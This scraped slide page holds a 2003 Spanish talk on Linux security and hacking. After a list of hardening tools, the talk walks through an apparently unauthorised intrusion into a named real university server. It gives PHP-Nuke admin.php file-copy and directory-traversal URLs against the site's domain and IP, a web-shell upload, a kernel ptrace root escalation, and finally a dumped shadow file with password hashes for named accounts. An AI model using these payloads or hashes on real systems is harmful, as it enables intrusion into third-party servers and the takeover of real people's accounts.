Curso Virtual Análisis de Malware 2022Curso Virtual Análisis de Malware 2022
Curso Virtual Análisis de Malware 2022Alonso Caballero
 
Curso Virtual Hacking ICS / SCADA 2022
Curso Virtual Hacking ICS / SCADA 2022Curso Virtual Hacking ICS / SCADA 2022
Curso Virtual Hacking ICS / SCADA 2022Alonso Caballero
 
Curso Virtual OWASP TOP 10 2021
Curso Virtual OWASP TOP 10 2021Curso Virtual OWASP TOP 10 2021
Curso Virtual OWASP TOP 10 2021Alonso Caballero
 
Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoAlonso Caballero
 

Más de Alonso Caballero (20)

Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking Ético
 
Curso Virtual Fundamentos de Hacking Web
Curso Virtual Fundamentos de Hacking WebCurso Virtual Fundamentos de Hacking Web
Curso Virtual Fundamentos de Hacking Web
 
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking Web
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking WebWebinar Gratuito: Escaneos con Scripts de Nmap para Hacking Web
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking Web
 
Curso Virtual Fundamentos de Hacking Ético
Curso Virtual Fundamentos de Hacking ÉticoCurso Virtual Fundamentos de Hacking Ético
Curso Virtual Fundamentos de Hacking Ético
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
 
Curso Virtual Hacking con Kali Linux
Curso Virtual Hacking con Kali LinuxCurso Virtual Hacking con Kali Linux
Curso Virtual Hacking con Kali Linux
 
Webinar Gratuito: "Zenmap para Pentesting"
Webinar Gratuito: "Zenmap para Pentesting"Webinar Gratuito: "Zenmap para Pentesting"
Webinar Gratuito: "Zenmap para Pentesting"
 
Curso Virtual Informática Forense
Curso Virtual Informática ForenseCurso Virtual Informática Forense
Curso Virtual Informática Forense
 
Webinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con AutopsyWebinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con Autopsy
 
Curso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebCurso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones Web
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de Comandos
 
Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking Ético
 
Webinar Gratuito: Nessus Essentials
Webinar Gratuito: Nessus EssentialsWebinar Gratuito: Nessus Essentials
Webinar Gratuito: Nessus Essentials
 
Curso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebCurso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones Web
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Curso Virtual Bug Bounty 2022
Curso Virtual Bug Bounty 2022Curso Virtual Bug Bounty 2022
Curso Virtual Bug Bounty 2022
 
Curso Virtual Análisis de Malware 2022
Curso Virtual Análisis de Malware 2022Curso Virtual Análisis de Malware 2022
Curso Virtual Análisis de Malware 2022
 
Curso Virtual Hacking ICS / SCADA 2022
Curso Virtual Hacking ICS / SCADA 2022Curso Virtual Hacking ICS / SCADA 2022
Curso Virtual Hacking ICS / SCADA 2022
 
Curso Virtual OWASP TOP 10 2021
Curso Virtual OWASP TOP 10 2021Curso Virtual OWASP TOP 10 2021
Curso Virtual OWASP TOP 10 2021
 
Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking Ético
 

Último

Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...JaquelineJuarez15
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofJuancarlosHuertasNio1
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Luis Olivera
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 

Último (20)

Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sof
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 

Presentacion re y_des_09072003

  • 1. SEGURIDAD Y HACKING EN LINUX Alonso Eduardo Caballero Quezada - ReYDeS - RareGaZz Security Team http://www.RareGaZz.org Security Wari Projetcs http://www.SWP-zone.org informatizate http://www.informatizate.net Miércoles 9 de Julio del 2003
  • 2. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 1. Seguridad 2. Seguridad en GNU/Linux 3. Hacking en Linux. (U.N.T)
  • 3. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 1. Seguridad en GNU/Linux Seguridad: Seguridad es la característica de un sistema informático, que indica que ese sistema está libre de todo peligro. “La seguridad es un estado mental”
  • 4. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Que proteger? . SoftWare . HardWare . Datos
  • 5. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I De quien nos protegemos? - Personas: . Personal de la empresa . Ex-empleados . Curiosos . Hackers . Crackers . Terroristas (*) . Intrusos Remunerados - Desastres Naturales:
  • 6. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I - Amenazas Logicas: . Software incorrecto . Herramientas de seguridad . Puertas traseras (Backdoor) . Bombas Logicas . Canales cubiertos . Virus . Gusanos . Caballos de Troya
  • 7. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I SEGURIDAD EN LINUX
  • 8. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 1. Definición de los servicios necesarios. . Servidor Web (Apache) . Servidor de Correo (Sendmail) . Servidor SSH, FTP, DNS etc.
  • 9. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 2. Utilizar Herramientas de Bastionado. (BASTILLE ó TITAN) . Educa al administrador sobre potenciales problemas de seguridad en el sistema.
  • 10. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 3. Utilizar un Antivirus basado en Software Libre. (AmaViS) . Indicado cuando hay interacción entre Linux u otro sistema Operativo.
  • 11. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 4. Utilización de un PROXY (SQUID). . Un punto de acceso entre una intranet y una internet. . Control de los datos. (squidGuard)
  • 12. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 5. Instalación y configuración de un Firewall. (IPTABLES). . Un punto estratégico de vigilancia del sistema. . Creación de reglas para las conecciones y servicios.
  • 13. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 6. Detección de Instrusos basados en HOST. (Tripwire) . Comprobar la integridad de los archivos en el sistema.
  • 14. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 7. Sistema Detector de Intrusos (IDS) . Vigilancia del Servidor. . Detección de actividad sospechosa. . Respuesta mediata e inmediata . Uso de (ACID) Consola de D.I
  • 15. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I 8. Administrador . Persona adecuada. . Experiencia. (*) . Actualización constante.
  • 16. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I HACKING EN LINUX
  • 17. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I ADVERTENCIA: El artículo completo y detallado de lo expuesto a continuación sera publicado en la eZine RareGaZz Número 20. http://www.RareGaZz.org Todo esta información se expone solo con fines didacticos y de conocimiento. De ninguna manera el autor o el Grupo RareGaZz induce a realizar este tipo de acciones. ReYDeS / RareGaZz Security Team
  • 18. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Institución: Universidad Nacional de Trujillo URL: http://www.unitru.edu.pe Tiempo Total: 2 horas. Objetivo: Auditoria Personal y Libre de la Seguridad del servidor de la Universidad Nacional de Trujillo
  • 19. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Primer Punto: Obtener todo la informacion posible del sistema. - Tools . NMAP (www.insecure.org/nmap) . NIKTO (http://www.cirt.net/code/nikto.shtml) . NetCat . Comandos propios de Linux, desde un simple ping a un dig por ejemplo. - Software De Auditoria: . NESSUS (http://www.nessus.org)
  • 20. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I NMAP
  • 21. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Nessus
  • 22. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  • 23. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Sistemas Vulnerables: PHP­Nuke 5.2 y anteriores Sistemas Inmunes: PHP­Nuke 5.0 RC1 Exploit:  Probando el formato de la siguiente URL: http://www.example.net/admin.php?upload=1 &file=config.php& file_name=hacked.txt&wdir=/images/&userfile=config.php & userfile_name=hacked.txt Mediante la anterior peticion de la anterior URL se podría observer leer en “config.php”. El cual contiene las claves de la Base de Datos. Con todas las posibles consecuencias que ello acarrea.
  • 24. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I PHP NUKE EXPLOIT
  • 25. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Lo anterior, permite automatizar el test sobre la falla en “admin.php” La URL que se analiza es la siguiente: http://www.unitru.edu.pe/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/ &userfile=config.php&userfile_name=hacked.txt Con esto se copia “hacked.txt” al directorio “images”. Pero nos lleva al menu administración con el siguiente error: Warning: Unable to create '/www/htdocs/images/hacked.txt’ : Permission denied in /www/htdocs/admin.php on line 400
  • 26. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  • 27. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  • 28. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Ahora la siguiente URL, nos permite listar cualquier directorio de la web. En éste caso “/images/admin/” http://www.unitru.edu.pe/admin.php?upload=1 &wdir=/images/admin/ Solo directorios de la WEB?... NO! http://200.60.44.6/admin.php?upload=1&wdir=/../../../ La Raiz del sistema (Formato texto) bin bin 4k 22-03-2001 18:56:22 boot boot 1k 23-03-2001 07:20:08 etc etc 4k 12-03-2003 09:04:18 root root 4k 22-02-2003 10:25:13 ...
  • 29. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Se puede listar cualquier directorio y ver archivos, pero solo con permisos de nobody. Que se necesita para elevar privilegios?. . Acceso de escritura a un directorio. . Copiar el config.php. Archivo de la configuración del phpnuke. . Obtener mas información del sistema. Pero ahora desde dentro, por ejemplo Software instalado, versiones, actualizaciones, conecciones, etc.
  • 30. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I . Problema: Tenemos el directorio /tmp/ para escritura, pero no podemos visualizar el archivo. Ya que estamos trabajando vía web. . Solución: Encontramos el programa YaBB http://aries.unitru.edu.pe/foro/install.php . Se tiene derechos de escritura en /foro/ y podemos visualizarlo vía web. Con lo cual: http://200.60.44.6/admin.php?upload=1&file=config.php &file_name=p.txt&wdir=/foro/&userfile=config.php &userfile_name=p.txt [DIR] Parent Directory 24-Feb-2003 23:47 - [ ] install.php 18-Feb-2003 03:08 18k [TXT] p.txt 18-Mar-2003 01:11 11k [ ] yse150.ya 18-Feb-2003 03:09 1.8M
  • 31. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I PHP Nuke xploit: Permite subir archivos al sistema.
  • 32. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Con la ayuda de PHP-Nuke exploit para subir archivos y el PHP Shell para ejecutar comandos ya se tiene un mejor control sobte el sistema.
  • 33. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I . En /foro/: . Subir cmd.html, rs.php Y en nuestro localhost utilizamos el phpnuker.html. Problema: Obtener privilegios ROOT. Solución: Ejecutar un exploit para “explotar” una falla en el sistema. Por ejemplo. Versión del Kernel? uname -a Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686 unknown
  • 34. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Linux kmod/ptrace bug: Cuando un proceso hace una petición a una caracteristica que esta en un modulo. En kernel crea un proceso hijo setea los permisos EUID GUID a 0 y llama a la funcion execve (“/sbin/mdprobe”) El problema es que antes de que el EUID cambie el proceso hijo puede ser añadido con ptrace. De ésta manera el usuario puede insertar codigo dentro del proceso lo cual se ejecutará con privilegios de superusuario (ROOT). Ejemplo: ->
  • 35. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: gdm:*:9797:0::::: nobody:*:9797:0::::: dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7::: mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7::: webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7::: toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7::: jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7::: kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7::: eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::
  • 36. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Gracias por su atención [root@camaratru root]# shutdown -r now e-mail: ReYDeS@bigfoot.com
  • 37. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Agradecimientos: Mi Madre, mi hermana, mi sobrino y Padre. Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown, enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel, Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los que alguna vez participaron en RareGaZz Security Team. A sicario, incompatible, xyz4a3, Sudmaster, y a todo los amigos de Security Wari Projects. A todos mis amigos virtuales del “Underground”. A Miguel, David, Deus, Francisco, Victor, Robert y Juan Manuel, del grupo informatizate. A Arturo, Alejandro, Javier, Juan, miembros de ICIAT. A todos mis amigos “reales”. A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol, Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily, Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice, Nathaly, etc, etc. En especial a mi: Futura Esposa. (Donde quiera que este)
  • 38. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I Problemas de identidad     * Me he olvidado el pasword....     * Me he olvidado mi login....     * ( variante de la anterior ) Es que no sé quien soy....     * Es que soy tonto, y necesito que me lo hagan....     * ¿Cuál es mi "dolarjome"?  Aspirantes a hacker     * ¿Qué tengo que hacer para entrar de root?     * ¿Cómo puedo saltarme el firewall?     * Oye, no me deja cambiar la configuración de las X...     * Es que quiero poner un sniffer, y necesito entrar de root...     * Qué hay que hacer en el firewall para que funcione la VozIP?
  • 39. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
  • 40. SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I